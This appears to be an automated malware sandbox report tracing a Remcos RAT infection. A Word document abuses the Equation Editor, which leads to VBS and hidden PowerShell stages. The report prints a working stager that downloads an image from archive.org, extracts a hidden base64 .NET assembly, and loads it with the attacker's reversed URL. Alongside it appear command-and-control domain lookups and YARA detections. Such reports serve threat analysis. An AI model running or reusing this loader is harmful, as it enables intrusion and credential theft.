                                                                                            Sep 27, 2024 14:03:59.582453966 CEST8.8.8.8192.168.2.220xde5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:03:59.589376926 CEST8.8.8.8192.168.2.220xde5No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:00.318022013 CEST8.8.8.8192.168.2.220x4da7Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:03.526823997 CEST8.8.8.8192.168.2.220x1f2Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:04.596395969 CEST8.8.8.8192.168.2.220xde5Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.709353924 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.723002911 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.734395981 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.745747089 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:05.756304026 CEST8.8.8.8192.168.2.220x2ffbNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.773870945 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.785607100 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.795650005 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.804503918 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:06.812680960 CEST8.8.8.8192.168.2.220x80c9No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.839571953 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.848284006 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.856482983 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.865385056 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:07.877347946 CEST8.8.8.8192.168.2.220x521aNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.596848965 CEST8.8.8.8192.168.2.220xde5Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.906687975 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.913932085 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.920460939 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.927335978 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:08.934551001 CEST8.8.8.8192.168.2.220xca60No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.075550079 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.085093975 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.092226028 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.100419044 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:10.108267069 CEST8.8.8.8192.168.2.220x503No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.121412992 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.128639936 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.136590004 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.144114017 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:11.150511980 CEST8.8.8.8192.168.2.220xc35fNo error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.184353113 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.191869020 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.200510979 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.209937096 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:12.218043089 CEST8.8.8.8192.168.2.220x19No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.687094927 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.696247101 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.703672886 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.710879087 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:14.718381882 CEST8.8.8.8192.168.2.220x3c71No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.136816025 CEST8.8.8.8192.168.2.220xff25No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.144876003 CEST8.8.8.8192.168.2.220xff25No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.151855946 CEST8.8.8.8192.168.2.220xff25No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:16.169992924 CEST8.8.8.8192.168.2.220xff25No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:18.989952087 CEST8.8.8.8192.168.2.220x42e1No error (0)camzeroconnect.duckdns.org192.3.101.29A (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:24.007128954 CEST8.8.8.8192.168.2.220x42e1Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            Sep 27, 2024 14:04:25.013233900 CEST8.8.8.8192.168.2.220x42e1Server failure (2)camzeroconnect.duckdns.orgnonenoneA (IP address)IN (0x0001)false
                                                                                            • ia601706.us.archive.org
                                                                                            • 185.235.137.223
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 185.235.137.223 | 80 | 3420 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 14:00:12.072154045 CEST | 336 | OUT | GET /220/someimportantmeetingsgoing.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 185.235.137.223
Connection: Keep-Alive
Sep 27, 2024 14:00:12.695019960 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 12:00:12 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Tue, 10 Sep 2024 08:56:30 GMT
ETag: "32ab8-621c00cb63cca"
Accept-Ranges: bytes
Content-Length: 207544
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49163 | 185.235.137.223 | 80 | 3732 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 14:00:18.469228029 CEST | 78 | OUT | GET /220/RDESC.txt HTTP/1.1
Host: 185.235.137.223
Connection: Keep-Alive
Sep 27, 2024 14:00:19.102987051 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 27 Sep 2024 12:00:18 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Tue, 10 Sep 2024 08:53:50 GMT
ETag: "a1000-621c00324bbf2"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID: 0
Source IP: 192.168.2.22
Source Port: 49162
Destination IP: 207.241.227.96
Destination Port: 443
PID: 3732
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp: 2024-09-27 12:00:16 UTC
Bytes transferred: 113
Direction: OUT
Data:
GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
Host: ia601706.us.archive.org
Connection: Keep-Alive

Timestamp: 2024-09-27 12:00:16 UTC
Bytes transferred: 582
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx/1.25.1
Date: Fri, 27 Sep 2024 12:00:16 GMT
Content-Type: image/jpeg
Content-Length: 1931225
Last-Modified: Thu, 05 Sep 2024 02:35:43 GMT
Connection: close
ETag: "66d918ff-1d77d9"
Strict-Transport-Security: max-age=15724800
Expires: Fri, 27 Sep 2024 18:00:16 GMT
Cache-Control: max-age=21600
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes



                                                                                            Target ID:0
                                                                                            Start time:08:00:07
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                            Imagebase:0x13f920000
                                                                                            File size:1'423'704 bytes
                                                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:08:00:09
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                            Imagebase:0x400000
                                                                                            File size:543'304 bytes
                                                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:08:00:12
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Windows\SysWOW64\wscript.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS"
                                                                                            Imagebase:0x5f0000
                                                                                            File size:141'824 bytes
                                                                                            MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:6
                                                                                            Start time:08:00:13
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[Base64-encoded payload omitted]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                            Imagebase:0x380000
                                                                                            File size:427'008 bytes
                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:8
                                                                                            Start time:08:00:13
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                                                            Imagebase:0x380000
                                                                                            File size:427'008 bytes
                                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.375410076.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:08:00:18
                                                                                            Start date:27/09/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                            Imagebase:0xed0000
                                                                                            File size:64'704 bytes
                                                                                            MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.891483132.0000000000581000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.891371553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.377952028.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6e4500e4b16e52b9c4df5457dcc54120d6e8a534b01c9738a1f86ad5d28d961
                                                                                              • Instruction ID: ea155a561f0b435fb77377b1e97e1d0fbfe34b8756c2608ddef332c46704a79f
                                                                                              • Opcode Fuzzy Hash: b6e4500e4b16e52b9c4df5457dcc54120d6e8a534b01c9738a1f86ad5d28d961
                                                                                              • Instruction Fuzzy Hash: D701A271504340EBEB204E26ECC4B67FF98EF517A4F2C851AFC890B286C3799845CAB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.377952028.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4d1ae6844aea8856ed8fbd49a17f959223a05ccfc5e2b10d437e6f88b10ec4e9
                                                                                              • Instruction ID: 51cd4ca819327201df9305b8449bf86fac9ffcd3403759e434fc7267c271a3b1
                                                                                              • Opcode Fuzzy Hash: 4d1ae6844aea8856ed8fbd49a17f959223a05ccfc5e2b10d437e6f88b10ec4e9
                                                                                              • Instruction Fuzzy Hash: 86F06D71504344AFEB208E16DCC8BA2FF98EB91764F18C55AED884F286C3799C44CAB1

                                                                                              Execution Graph

                                                                                              Execution Coverage:10.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:58.7%
                                                                                              Total number of Nodes:46
                                                                                              Total number of Limit Nodes:2

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: ContextMemoryProcessThreadWow64Write
                                                                                              • String ID:
                                                                                              • API String ID: 3696009080-0
                                                                                              • Opcode ID: 922a20106eb0ad97a3d0f4fd909b96e7861b8063aafa416c6ced4e752f9eac5e
                                                                                              • Instruction ID: f49659dbb461d78b80aaece91c4fd5900b746ddaf43c25e13ffab3698e5abfc8
                                                                                              • Opcode Fuzzy Hash: 922a20106eb0ad97a3d0f4fd909b96e7861b8063aafa416c6ced4e752f9eac5e
                                                                                              • Instruction Fuzzy Hash: E662E074D112399FEB68DF65D884BEDBBB2AB89300F5081EAD40DA7290DB305E91CF50

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2238f32eb5e4cb58fc774d80480da5a4b0d88e02cc08a3fdf89b657c3bd25f8f
                                                                                              • Instruction ID: a7b7684bf3d0977c306c6c76f12ad768d6f18e3827d5944c54f3ae38622632f5
                                                                                              • Opcode Fuzzy Hash: 2238f32eb5e4cb58fc774d80480da5a4b0d88e02cc08a3fdf89b657c3bd25f8f
                                                                                              • Instruction Fuzzy Hash: AD32F074D112299FEB28DF65D894BEDBBB2BB89300F5081EAD40DA7291DB305E95CF40

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: L4#p$L4#p$L4#p$d=&
                                                                                              • API String ID: 0-3814417703
                                                                                              • Opcode ID: 9b79bdd90ef79c8ddc495369c88a550fd8eea1243aa85fa7917d3a3d772af3a9
                                                                                              • Instruction ID: af117820374c1367582075099a2689a4ce520557d7080e31803cb4ac8fcb75d8
                                                                                              • Opcode Fuzzy Hash: 9b79bdd90ef79c8ddc495369c88a550fd8eea1243aa85fa7917d3a3d772af3a9
                                                                                              • Instruction Fuzzy Hash: B6B1073170420CEFDB199F64C8507BE7BA2AF85310F14C46AEA018B392DB79DD56CB92

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373823920.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7f0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: l;&$l;&
                                                                                              • API String ID: 0-1902425293
                                                                                              • Opcode ID: 9a053072d276cc745b998bcac93788e6cc04b90f3241cc67c98119bc254a6d5a
                                                                                              • Instruction ID: 1d21bc7d5f2c1f28fccab3a617c295c2d4823c91d879c4cd527a19c65b7c80aa
                                                                                              • Opcode Fuzzy Hash: 9a053072d276cc745b998bcac93788e6cc04b90f3241cc67c98119bc254a6d5a
                                                                                              • Instruction Fuzzy Hash: E8F11635B04309DFDB249A68C81077ABBE2AFD1311F2484BAD655DB382DB79CC45C7A2

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 248 22172c-2259bb 250 2259d2-2259e0 248->250 251 2259bd-2259cf 248->251 252 2259e2-2259f4 250->252 253 2259f7-225a33 250->253 251->250 252->253 254 225a47-225b22 CreateProcessW 253->254 255 225a35-225a44 253->255 259 225b24-225b2a 254->259 260 225b2b-225bf4 254->260 255->254 259->260 269 225bf6-225c1f 260->269 270 225c2a-225c35 260->270 269->270 274 225c36 270->274 274->274
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00225B0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 76e2ed80d7290f3831ce0b796d7bafcf1461a8cf394bd0bff59d3dc0ab2a57d6
                                                                                              • Instruction ID: cf127db5b1fdb0e0b1da1d233c1150effb574451624417d149ae41e67f9870f2
                                                                                              • Opcode Fuzzy Hash: 76e2ed80d7290f3831ce0b796d7bafcf1461a8cf394bd0bff59d3dc0ab2a57d6
                                                                                              • Instruction Fuzzy Hash: 3381CF71C0026DDFDF25DFA5D880BEDBBB1AB49304F1090AAE548B7260DB709A95CF94

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 275 22592e-2259bb 276 2259d2-2259e0 275->276 277 2259bd-2259cf 275->277 278 2259e2-2259f4 276->278 279 2259f7-225a33 276->279 277->276 278->279 280 225a47-225b22 CreateProcessW 279->280 281 225a35-225a44 279->281 285 225b24-225b2a 280->285 286 225b2b-225bf4 280->286 281->280 285->286 295 225bf6-225c1f 286->295 296 225c2a-225c35 286->296 295->296 300 225c36 296->300 300->300
                                                                                              APIs
                                                                                              • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00225B0F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 835769ade5201d525b58177d86bdbe98addd74bb0cebf2031e831b5e3f99c4bc
                                                                                              • Instruction ID: e25224c0fd9e23b507d0552cae4543bb8cd0e97640690ddfab2e43fa1c74e60d
                                                                                              • Opcode Fuzzy Hash: 835769ade5201d525b58177d86bdbe98addd74bb0cebf2031e831b5e3f99c4bc
                                                                                              • Instruction Fuzzy Hash: 5681DF71C0026DDFDF25CFA4D880BEDBBB1AB49304F0090AAE548B7260DB709A95CF94

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 301 221774-225fff 303 226001-226013 301->303 304 226016-226076 WriteProcessMemory 301->304 303->304 305 226078-22607e 304->305 306 22607f-2260bd 304->306 305->306
                                                                                              APIs
                                                                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00226066
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.373720885.0000000000220000.00000040.00000800.00020000.00000000.sdmp, Offset: 00220000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_220000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: MemoryProcessWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3559483778-0
                                                                                              • Opcode ID: bd634454dddebf77869f35ae1b6d0bdfc7792e2caa3b2cfd608ac6878971e0a1
                                                                                              • Instruction ID: cdd207da4f2031948be54454aa9099fd2b6deaa4810ad1be09bcc0f1955ea1c9
                                                                                              • Opcode Fuzzy Hash: bd634454dddebf77869f35ae1b6d0bdfc7792e2caa3b2cfd608ac6878971e0a1
